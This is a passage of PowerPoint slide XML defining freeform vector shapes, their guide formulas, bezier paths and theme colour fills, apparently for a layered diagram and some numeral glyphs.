                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="384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Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5096109" y="3544123"/>
                <a:ext cx="857035" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 541 w 612"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 612 w 612"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 195 w 612"/>
                  <a:gd name="T5" fmla="*/ 17 h 473"/>
                  <a:gd name="T6" fmla="*/ 0 w 612"/>
                  <a:gd name="T7" fmla="*/ 422 h 473"/>
                  <a:gd name="T8" fmla="*/ 541 w 612"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 541 w 612"/>
                  <a:gd name="T11" fmla="*/ 473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2" h="473">
                    <a:moveTo>
                      <a:pt x="541" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="612" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5146523" y="3579133"/>
                <a:ext cx="767411" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 548"/>
                  <a:gd name="T1" fmla="*/ 376 h 423"/>
                  <a:gd name="T2" fmla="*/ 175 w 548"/>
                  <a:gd name="T3" fmla="*/ 16 h 423"/>
                  <a:gd name="T4" fmla="*/ 548 w 548"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 485 w 548"/>
                  <a:gd name="T7" fmla="*/ 423 h 423"/>
                  <a:gd name="T8" fmla="*/ 0 w 548"/>
                  <a:gd name="T9" fmla="*/ 376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8" h="423">
                    <a:moveTo>
                      <a:pt x="0" y="376"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="376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27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5853717" y="3544123"/>
                <a:ext cx="1539023" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1099"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 71 w 1099"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 878 w 1099"/>
                  <a:gd name="T5" fmla="*/ 11 h 473"/>
                  <a:gd name="T6" fmla="*/ 1099 w 1099"/>
                  <a:gd name="T7" fmla="*/ 440 h 473"/>
                  <a:gd name="T8" fmla="*/ 0 w 1099"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 0 w 1099"/>
                  <a:gd name="T11" fmla="*/ 473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99" h="473">
                    <a:moveTo>
                      <a:pt x="0" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473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28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5892928" y="3577733"/>
                <a:ext cx="1445197" cy="595167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 1032"/>
                  <a:gd name="T1" fmla="*/ 0 h 425"/>
                  <a:gd name="T2" fmla="*/ 835 w 1032"/>
                  <a:gd name="T3" fmla="*/ 11 h 425"/>
                  <a:gd name="T4" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T5" fmla="*/ 393 h 425"/>
                  <a:gd name="T6" fmla="*/ 0 w 1032"/>
                  <a:gd name="T7" fmla="*/ 425 h 425"/>
                  <a:gd name="T8" fmla="*/ 64 w 1032"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="425">
                    <a:moveTo>
                      <a:pt x="64" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="835" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="425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29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5019088" y="4244319"/>
                <a:ext cx="2457675" cy="161045"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1755"/>
                  <a:gd name="T1" fmla="*/ 36 h 115"/>
                  <a:gd name="T2" fmla="*/ 1052 w 1755"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 1755 w 1755"/>
                  <a:gd name="T5" fmla="*/ 64 h 115"/>
                  <a:gd name="T6" fmla="*/ 576 w 1755"/>
                  <a:gd name="T7" fmla="*/ 115 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 1755"/>
                  <a:gd name="T9" fmla="*/ 36 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 1755"/>
                  <a:gd name="T11" fmla="*/ 36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55" h="115">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1052" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1755" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4747414" y="4294733"/>
                <a:ext cx="1078296" cy="838835"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 194 w 770"/>
                  <a:gd name="T1" fmla="*/ 0 h 599"/>
                  <a:gd name="T2" fmla="*/ 770 w 770"/>
                  <a:gd name="T3" fmla="*/ 79 h 599"/>
                  <a:gd name="T4" fmla="*/ 692 w 770"/>
                  <a:gd name="T5" fmla="*/ 599 h 599"/>
                  <a:gd name="T6" fmla="*/ 0 w 770"/>
                  <a:gd name="T7" fmla="*/ 394 h 599"/>
                  <a:gd name="T8" fmla="*/ 194 w 770"/>
                  <a:gd name="T9" fmla="*/ 0 h 599"/>
                  <a:gd name="T10" fmla="*/ 194 w 770"/>
                  <a:gd name="T11" fmla="*/ 0 h 5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70" h="599">
                    <a:moveTo>
                      <a:pt x="194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="770" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0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chemeClr val="accent2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Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4796427" y="4331144"/>
                <a:ext cx="990072" cy="759013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 707"/>
                  <a:gd name="T1" fmla="*/ 353 h 542"/>
                  <a:gd name="T2" fmla="*/ 173 w 707"/>
                  <a:gd name="T3" fmla="*/ 0 h 542"/>
                  <a:gd name="T4" fmla="*/ 707 w 707"/>
                  <a:gd name="T5" fmla="*/ 74 h 542"/>
                  <a:gd name="T6" fmla="*/ 637 w 707"/>
                  <a:gd name="T7" fmla="*/ 542 h 542"/>
                  <a:gd name="T8" fmla="*/ 0 w 707"/>
                  <a:gd name="T9" fmla="*/ 353 h 5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7" h="542">
                    <a:moveTo>
                      <a:pt x="0" y="353"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="173" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="542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32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5716480" y="4333944"/>
                <a:ext cx="2078171" cy="799624"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 86 w 1638"/>
                  <a:gd name="T3" fmla="*/ 56 h 630"/>
                  <a:gd name="T4" fmla="*/ 0 w 1638"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 1638 w 1638"/>
                  <a:gd name="T7" fmla="*/ 481 h 630"/>
                  <a:gd name="T8" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T9" fmla="*/ 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38" h="630">
                    <a:moveTo>
                      <a:pt x="1388" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="500"/>
                      <a:pt x="1091" y="531"/>
                      <a:pt x="1638" y="481"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0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33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5755691" y="4367554"/>
                <a:ext cx="1985745" cy="729604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 1565"/>
                  <a:gd name="T1" fmla="*/ 55 h 574"/>
                  <a:gd name="T2" fmla="*/ 1341 w 1565"/>
                  <a:gd name="T3" fmla="*/ 0 h 574"/>
                  <a:gd name="T4" fmla="*/ 1565 w 1565"/>
                  <a:gd name="T5" fmla="*/ 431 h 574"/>
                  <a:gd name="T6" fmla="*/ 1427 w 1565"/>
                  <a:gd name="T7" fmla="*/ 443 h 574"/>
                  <a:gd name="T8" fmla="*/ 608 w 1565"/>
                  <a:gd name="T9" fmla="*/ 518 h 574"/>
                  <a:gd name="T10" fmla="*/ 0 w 1565"/>
                  <a:gd name="T11" fmla="*/ 574 h 574"/>
                  <a:gd name="T12" fmla="*/ 78 w 1565"/>
                  <a:gd name="T13" fmla="*/ 55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65" h="574">
                    <a:moveTo>
                      <a:pt x="78" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="608" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="78" y="5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Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4673193" y="4964121"/>
                <a:ext cx="3211082" cy="389309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 337 w 2293"/>
                  <a:gd name="T1" fmla="*/ 0 h 278"/>
                  <a:gd name="T2" fmla="*/ 0 w 2293"/>
                  <a:gd name="T3" fmla="*/ 27 h 278"/>
                  <a:gd name="T4" fmla="*/ 723 w 2293"/>
                  <a:gd name="T5" fmla="*/ 278 h 278"/>
                  <a:gd name="T6" fmla="*/ 2293 w 2293"/>
                  <a:gd name="T7" fmla="*/ 111 h 278"/>
                  <a:gd name="T8" fmla="*/ 1846 w 2293"/>
                  <a:gd name="T9" fmla="*/ 20 h 278"/>
                  <a:gd name="T10" fmla="*/ 745 w 2293"/>
                  <a:gd name="T11" fmla="*/ 121 h 278"/>
                  <a:gd name="T12" fmla="*/ 337 w 2293"/>
                  <a:gd name="T13" fmla="*/ 0 h 278"/>
                  <a:gd name="T14" fmla="*/ 337 w 2293"/>
                  <a:gd name="T15" fmla="*/ 0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93" h="278">
                    <a:moveTo>
                      <a:pt x="337" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2293" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1846" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="0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35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4429526" y="5001931"/>
                <a:ext cx="1256145" cy="1095107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 174 w 897"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 165 w 897"/>
                  <a:gd name="T3" fmla="*/ 18 h 782"/>
                  <a:gd name="T4" fmla="*/ 0 w 897"/>
                  <a:gd name="T5" fmla="*/ 357 h 782"/>
                  <a:gd name="T6" fmla="*/ 817 w 897"/>
                  <a:gd name="T7" fmla="*/ 782 h 782"/>
                  <a:gd name="T8" fmla="*/ 897 w 897"/>
                  <a:gd name="T9" fmla="*/ 251 h 782"/>
                  <a:gd name="T10" fmla="*/ 174 w 897"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 174 w 897"/>
                  <a:gd name="T13" fmla="*/ 0 h 7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7" h="782">
                    <a:moveTo>
                      <a:pt x="174" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="0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36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4474339" y="5043943"/>
                <a:ext cx="1173522" cy="1002681"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 838"/>
                  <a:gd name="T1" fmla="*/ 317 h 716"/>
                  <a:gd name="T2" fmla="*/ 154 w 838"/>
                  <a:gd name="T3" fmla="*/ 0 h 716"/>
                  <a:gd name="T4" fmla="*/ 838 w 838"/>
                  <a:gd name="T5" fmla="*/ 236 h 716"/>
                  <a:gd name="T6" fmla="*/ 766 w 838"/>
                  <a:gd name="T7" fmla="*/ 716 h 716"/>
                  <a:gd name="T8" fmla="*/ 0 w 838"/>
                  <a:gd name="T9" fmla="*/ 317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8" h="716">
                    <a:moveTo>
                      <a:pt x="0" y="317"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="154" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="317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37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5573641" y="5119564"/>
                <a:ext cx="2608916" cy="977474"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T1" fmla="*/ 0 h 698"/>
                  <a:gd name="T2" fmla="*/ 80 w 1863"/>
                  <a:gd name="T3" fmla="*/ 167 h 698"/>
                  <a:gd name="T4" fmla="*/ 0 w 1863"/>
                  <a:gd name="T5" fmla="*/ 698 h 698"/>
                  <a:gd name="T6" fmla="*/ 1863 w 1863"/>
                  <a:gd name="T7" fmla="*/ 411 h 698"/>
                  <a:gd name="T8" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T9" fmla="*/ 0 h 698"/>
                  <a:gd name="T10" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T11" fmla="*/ 0 h 6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63" h="698">
                    <a:moveTo>
                      <a:pt x="1650" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1863" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:ln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38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5614252" y="5155975"/>
                <a:ext cx="2516491" cy="901853"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 1797"/>
                  <a:gd name="T1" fmla="*/ 163 h 644"/>
                  <a:gd name="T2" fmla="*/ 1607 w 1797"/>
                  <a:gd name="T3" fmla="*/ 0 h 644"/>
                  <a:gd name="T4" fmla="*/ 1797 w 1797"/>
                  <a:gd name="T5" fmla="*/ 367 h 644"/>
                  <a:gd name="T6" fmla="*/ 0 w 1797"/>
                  <a:gd name="T7" fmla="*/ 644 h 644"/>
                  <a:gd name="T8" fmla="*/ 72 w 1797"/>
                  <a:gd name="T9" fmla="*/ 163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97" h="644">
                    <a:moveTo>
                      <a:pt x="72" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1607" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1797" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="163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69" name="Freeform 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC45329F-9B8C-4021-BAD4-370ED5EA1C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21236" y="2193331"/>
              <a:ext cx="138638" cy="245069"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 110"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 110"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 110"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 110"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 110"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="194">
                  <a:moveTo>
                    <a:pt x="110" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="55" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="6"/>
                    <a:pt x="95" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="32"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61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49" y="30"/>
                    <a:pt x="44" y="33"/>
                    <a:pt x="41" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="41" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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1" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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86" name="Freeform 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99883ED-E447-444F-9897-8D1BB0715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6284" y="2194731"/>
              <a:ext cx="91025" cy="240867"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 65 w 65"/>
                <a:gd name="T1" fmla="*/ 172 h 172"/>
                <a:gd name="T2" fmla="*/ 31 w 65"/>
                <a:gd name="T3" fmla="*/ 172 h 172"/>
                <a:gd name="T4" fmla="*/ 31 w 65"/>
                <a:gd name="T5" fmla="*/ 36 h 172"/>
                <a:gd name="T6" fmla="*/ 0 w 65"/>
                <a:gd name="T7" fmla="*/ 37 h 172"/>
                <a:gd name="T8" fmla="*/ 0 w 65"/>
                <a:gd name="T9" fmla="*/ 12 h 172"/>
                <a:gd name="T10" fmla="*/ 65 w 65"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 65 w 65"/>
                <a:gd name="T13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172">
                  <a:moveTo>
                    <a:pt x="65" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31" y="172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="17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87" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17699652-4F44-44CD-B941-B61CA32184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43055" y="2953931"/>
              <a:ext cx="140038" cy="246469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 56 w 111"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
